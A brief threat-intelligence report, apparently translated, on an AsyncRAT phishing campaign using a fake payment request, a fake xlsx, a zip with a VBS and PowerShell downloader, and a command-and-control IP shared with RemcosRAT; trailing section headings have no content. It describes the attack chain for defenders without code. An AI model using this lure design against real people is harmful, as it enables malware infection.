Asyncrat campaign also via payment request. The email false xlsx points to a fake site with a zip document. This contains a VBS with a powershell, which downloads the malware. C2 is the same as RemcosRAT

Asyncrat hides behind a fake payment request from a Chinese company. The email, also arrived in Italy, contains a fake xlsx file attached, which is actually a photo.

Opening it, you are directed to a fake site, which contains a compressed document in zip format, which simulates the purchase order.

Inside, however, there is a VBS file with Powershell, which downloads the malware.

This connects to the command and control server (79.134.225.100), the same one used since January by another malicious code: RemcosRAT.

Base64 decoding

Persistence